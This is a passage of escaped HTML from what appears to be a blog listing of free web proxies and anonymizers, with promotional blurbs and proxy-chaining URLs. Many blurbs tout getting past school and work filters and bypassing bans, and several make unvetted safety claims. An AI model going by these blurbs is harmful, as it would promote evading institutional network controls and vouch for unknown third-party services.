software. Bypass bans and hide your ip through famous5.net proxy.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chains):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.famous5.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.famous5.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://no1proxy.com/"&gt;No1Proxy.com&lt;/a&gt; -&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;Free proxy site with a cgi proxy tool, daily updated proxy lists and information on anonymous and https proxy servers. &lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for creating proxy chain): http://www.no1proxy.com&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://proxyspy.com/"&gt;ProxySpy.com&lt;/a&gt; – Proxy Spy protects your privacy and keeps your computer secure by allowing you without revealing your IP address or personal information. Proxy Spy has a range of features including disabling javascript, encoding URLs to bypass filters, disable showing of images, reject cookies etc. Proxy Spy is hosted on a fast server with high uptime – this means you can always count on it, day or night, to protect you.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://theproxy.be/"&gt;TheProxy.be&lt;/a&gt; – TheProxy always hides your IP address, so all sites will not be able to uniquely your identify or track you. It`s absolutely free. Mirror Mirror1&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for making proxy chains):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.theproxy.be/"&gt;&lt;span style="color: #351c75;"&gt;http://www.theproxy.be&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.newproxy.be/"&gt;&lt;span style="color: #351c75;"&gt;http://www.newproxy.be&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.smartproxy.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.smartproxy.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://proxyprince.com/"&gt;ProxyPrince.com&lt;/a&gt; – Very fast US based PHP proxy. Very easy to use, and very quick. ProxyPrince will keep you safe and secure. Anonimity is our main concern, your tracks are sure to be kept hidden.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://pimpmyip.com/"&gt;PimpMyIP.com&lt;/a&gt; – Free anonymous web proxy. Bypass blocked websites and browse privately at work or school. Shields you against cookies, spyware and malicious scripts.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://ohmyproxy.com/"&gt;OhMyProxy.com&lt;/a&gt; – Free Anonymous Browsing. Hide your IP and get past school and work filters.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Clever Proxy – Clever Proxy is a smart and intelligent web-based proxy service. It allows you to remain anonymous whilst using the internet. By using this anonymizer you will also be protecting your computer because when you surf anonymously people cannot find out your IP address and attempt to hack you.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;A Proxy Site – A Proxy Site is a simple and reliable web-based anonymizer. By using it you can bypass filters and remain completely anonymous whilst surfing the internet. It has many features including blocking JavaScript and cookies.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Fully Sick Proxy – Fully Sick proxy allows you to remain anonymous on the internet by routing web requests for you. This means you can stay protected and also disable javascript and block cookies. Our site is fast and reliable too.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Desire Proxy – Desire proxy is a premium free anonymous proxy. It provides many of the features of the paid services for nothing! These include cookie removal, no image browsing and more. Keep anonymous and keep secure with Desire Proxy. We know what you desire!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Perfect Proxy – Perfect Proxy is just that – perfect! It provides excellent reliability and website support and also keeps you anonymous in the process. It has many additional features to add to the experience.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Prime Proxy – Prime Proxy provides a great free proxy service to the general public. It keeps you anonymous and safe whilst browsing your favorite websites. Prime Proxy is used by students and adults in many different situations. Try us today – it’s 100% free!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Proxy Aware – Since you’re visiting freeproxy.ru you must be proxy aware, so why not check out Proxy Aware? It’s a perfect free proxy which keeps you anonymous whilst browsing the web! It has many additional features such as cookie blocking, disabling images and URL encoding to bypass school and work filters.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Proxy Craze – At the moment there is a proxy craze going on, and Proxy Craze is proud to be part of it! With a delicious serving of features to make any proxy user cry, Proxy Craze is the proxy of choice! Features include URL encoding, cookie blocking / image blocking, and a neat interface!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Proxy Gasp – Our proxy is so good it will make you gasp – as the name suggests. To use this proxy simply type the URL into the website and gasp.your at the site remaining totally anonymous! This means websites cannot record your IP and later use it to hack or send you junk!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Proxy Please – Well, thanks for saying please! This is a great proxy site with all the usual features including cookie blocking, no images, URL encoding all whilst being extremely fast and reliable. If you want to bypass filters then this is the site you need!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Some Proxy – Easy to remember domain, great features, and nice and fast! Keeps you totally anonymous whilst browsing the internet, and allows you to bypass filters and school or at work. Features include URL encoding and cookie blocking!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Stupid Proxy – Despite the name, this proxy is anything but stupid! If you’re going to use a proxy, use Stupid Proxy! It’s no frills yet great to use including many simple features that will make your life easier including URL encoding (bypass filters) and image-less browsing. Enjoy!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;That Proxy – Which proxy – this proxy? Why not! A bunch of excellent features, fast and reliable and a clean and neat design are all reasons why you should choose ‘That Proxy’! By using our site you will remain anonymous and avoid security issues like people hacking your computer.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Want Proxy – For you to be at this site you must want some proxy, so all you need to do is type that in, and finish it with a .com, and you’re done! ‘Want Proxy’ is an excellent proxy site that you’ll end up using all the time. It’s a favorite amongst students and workers who want to bypass filters.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.unblockmyspace.com/"&gt;www.UnBlockMySpace.com&lt;/a&gt; – Unblock MySpace is a free service created to view MySpace proxy website from school and work computers through a PHP and CGI backend (web based proxy). This site uses the server proxy IP for surfing the web anonymously. Protect your privacy! Surf Anonymously! Bypass Security Filters! Private Browsing!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxyforall.com/"&gt;www.ProxyForAll.com&lt;/a&gt; – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.myproxysurfer.com/"&gt;www.MyProxySurfer.com&lt;/a&gt; – Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxycat.com/"&gt;www.ProxyCat.com&lt;/a&gt; – Proxycat.com is a free easy to use cgi proxy service that blocks cookies and hides your IP to keep you anonymous as you surf the web.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxydetective.com/"&gt;www.ProxyDetective.com&lt;/a&gt; – ProxyDetective – Simple and Free cgi-webbased anonymous proxy surfing. Surf safely from your work, school or home.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.indianproxy.com/"&gt;www.indianproxy.com&lt;/a&gt; – Access your webmail, myspace, and much more in school or work anonymously.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxybrowsing.com/"&gt;www.proxybrowsing.com&lt;/a&gt; – Access blocked websites in school or work safely and anonymously. Surf with Ad Free Browsing Pages!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxypi.com/"&gt;www.ProxyPi.com&lt;/a&gt; – We do not sleep until you have a safe route. Use us at school, work or home. We can bypass most filters.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxyjet.com/"&gt;www.proxyjet.com&lt;/a&gt; – Hide your movements via our anonymous proxy. Our proxy will bypass school and work filters.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.justhide.com/"&gt;www.justhide.com&lt;/a&gt; – We allow you to bypass your school and work filters to allow you surf the internet anonymously.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Other anonymizers&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Anonymization – free web anonymyzer. Supports anonymous web surfing, anonymous web seek (meta search by many search engines) and FTP surf – surf anonymously in any FTP server. By using this web proxy you can surf anonymously more than 5.000.000.000 web pages.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.anonymization.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.anonymization.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Guardster – good anonymizer. Controls cookies, scripts, ADs, images and referrers.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.guardster.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.guardster.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;ProxyWeb – good anonymizer, can delete Java, JavaScript, cookies and ActiveX. Also this web proxy uses HTTPS (secure) connection – so nobody can detect what you download from Internet.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.proxyweb.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyweb.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;WebWarper – This is a popular free web anonymizer. This CGI proxy can pack web pages “on the fly”.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://webwarper.net/"&gt;&lt;span style="color: #351c75;"&gt;http://webwarper.net&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;MegaProxy – Free anonymizer can work with HTTPS sites.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.megaproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.megaproxy.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.amegaproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.amegaproxy.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;W3Privacy.com – free web based anonymizing proxy. Instant access, no download, no registration, and no fee required.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.w3privacy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.w3privacy.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Anonymizer.RU – russian anonymizer: this russian CGI proxy has many additional options only after registration.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.anonymizer.ru/"&gt;&lt;span style="color: #351c75;"&gt;http://www.anonymizer.ru&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;The-cloak – This is a free CGI proxy. This anonymizer supports HTTP, FTP and HTTPS sessions. Can hide referrers. Requires payment..&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for chaining proxy):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.the-cloak.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.the-cloak.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;Pure privacy – cool anonymizer + remailer. You can use this anonymizer to send anonymous e-mails (by using this anonymizer with anonymous proxy)&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.pureprivacy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.pureprivacy.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://proxify.com%20/"&gt;Proxify.com &lt;/a&gt;– Good fast anonymizer that can remove cookies, ADs, referrers and can use HTTPS connections.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://proxify.com/"&gt;&lt;span style="color: #351c75;"&gt;http://proxify.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;http://www.urlencoded.com– The better cgi proxy server. It has many different features, inclusive enabling / disabling cookies, all scripts, AD banners, referrer information, browser and OS info and many more.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for cgi proxy chaining):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.urlencoded.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.urlencoded.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.snoopblocker.com/"&gt;http://www.snoopblocker.com&lt;/a&gt; – Good cgi proxy (anonymizer). It uses 128-bit SSL-encoding. Can enable/lock Java, JavaScript, Cookies, ActiveX.&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;URL (for creating anonymizers chain):&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.snoopblocker.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.snoopblocker.com&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.long999.com/"&gt;http://www.long999.com&lt;/a&gt;– Mirror&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.psurf.net/"&gt;www.psurf.net&lt;/a&gt; – Psurf is one of the fatest proxy services on the net. Using new and advanced technology to help you bypass your school firewalls and filters. Allowing you to view what you want, when you want!&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.phproxy.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.phproxy.info&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br style="color: #351c75;" /&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.proxy121.com/"&gt;http://www.proxy121.com&lt;/a&gt;– The 121 relationship between you and annonimity. Fast, reliable and secure! Mirror1&lt;/span&gt;&lt;br style="color: #351c75;" /&gt;&lt;b&gt;&lt;a href="http://www.bigate.com/cgi-bin/bigate/b/k/k/"&gt;&lt;span style="color: #351c75;"&gt;http://www.bigate.com/cgi-bin/bigate/b/k/k/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.userbeam.de/"&gt;&lt;span style="color: #351c75;"&gt;http://www.userbeam.de&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.calcmaster.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.calcmaster.net&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.misterprivacy.com/begin_anonymous_surfing.htm"&gt;&lt;span style="color: #351c75;"&gt;http://www.misterprivacy.com/begin_anonymous_surfing.htm&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.myshield.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.myshield.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.idzap.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.idzap.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.safegatetech.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.safegatetech.com&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.breiter.ch/"&gt;&lt;span style="color: #351c75;"&gt;http://www.breiter.ch/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.rrdb.org/rrdbproxy.php?l=en"&gt;&lt;span style="color: #351c75;"&gt;http://www.rrdb.org/rrdbproxy.php?l=en&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://proxy.decodes.biz/"&gt;&lt;span style="color: #351c75;"&gt;http://proxy.decodes.biz/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://proxy.mxds.ch/"&gt;&lt;span style="color: #351c75;"&gt;http://proxy.mxds.ch/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.spondoo.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.spondoo.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://search.sicomm.us/"&gt;&lt;span style="color: #351c75;"&gt;http://search.sicomm.us/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://schnarre-monika.celebrityblog.net/cache.cgi"&gt;&lt;span style="color: #351c75;"&gt;http://schnarre-monika.celebrityblog.net/cache.cgi&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://filter2005.com/"&gt;&lt;span style="color: #351c75;"&gt;http://filter2005.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.kproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.kproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.websitereactor.org/cgi-bin/001/nph-.pl"&gt;&lt;span style="color: #351c75;"&gt;http://www.websitereactor.org/cgi-bin/001/nph-.pl&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.goproxing.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.goproxing.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://anonycat.com/"&gt;&lt;span style="color: #351c75;"&gt;http://anonycat.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.spynot.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.spynot.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.merletn.org/anonymizer"&gt;&lt;span style="color: #351c75;"&gt;http://www.merletn.org/anonymizer&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.cgi-proxy.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.cgi-proxy.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxymouse.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxymouse.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.theunblocker.tk/"&gt;&lt;span style="color: #351c75;"&gt;http://www.theunblocker.tk/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.betaproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.betaproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.letsproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.letsproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.freeproxysurf.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.freeproxysurf.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.mysticproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.mysticproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxywave.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxywave.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.vtunnel.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.vtunnel.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxysnail.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxysnail.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.freeproxy.ca/"&gt;&lt;span style="color: #351c75;"&gt;http://www.freeproxy.ca/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://basic.3proxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://basic.3proxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.privatebrowsing.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.privatebrowsing.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.hackingtruths.org/proxy"&gt;&lt;span style="color: #351c75;"&gt;http://www.hackingtruths.org/proxy&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://xanproxy.be/"&gt;&lt;span style="color: #351c75;"&gt;http://xanproxy.be/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.ipsecret.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.ipsecret.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxyanon.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxyanon.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.anonproxy.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.anonproxy.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxysafe.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxysafe.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.strongproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.strongproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.boredatschool.net/"&gt;&lt;span style="color: #351c75;"&gt;http://www.boredatschool.net/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.ukproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.ukproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.simpleproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.simpleproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.phproxy.org/"&gt;&lt;span style="color: #351c75;"&gt;http://www.phproxy.org/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://surfonym.com/"&gt;&lt;span style="color: #351c75;"&gt;http://surfonym.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://geoepker.hu/freeproxy/"&gt;&lt;span style="color: #351c75;"&gt;http://geoepker.hu/freeproxy/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.browseatwork.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.browseatwork.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.ipblocker.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.ipblocker.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.boredatwork.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.boredatwork.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.anonymousurfing.info/"&gt;&lt;span style="color: #351c75;"&gt;http://www.anonymousurfing.info/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.browsingwork.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.browsingwork.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.freeproxyserver.org/"&gt;&lt;span style="color: #351c75;"&gt;http://www.freeproxyserver.org/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.browseany.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.browseany.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.browsesecurely.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.browsesecurely.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://ieproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://IEproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.sneak3.po.gs/"&gt;&lt;span style="color: #351c75;"&gt;http://www.sneak3.po.gs/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.proxytastic.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.proxytastic.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.freewebproxy.org/"&gt;&lt;span style="color: #351c75;"&gt;http://www.freewebproxy.org/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.thecgiproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.thecgiproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.hide-me.be/"&gt;&lt;span style="color: #351c75;"&gt;http://www.hide-me.be/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a href="http://www.anotherproxy.com/"&gt;&lt;span style="color: #351c75;"&gt;http://www.anotherproxy.com/&lt;/span&gt;&lt;/a&gt;&lt;br style="color: #351c75;" /&gt;&lt;a 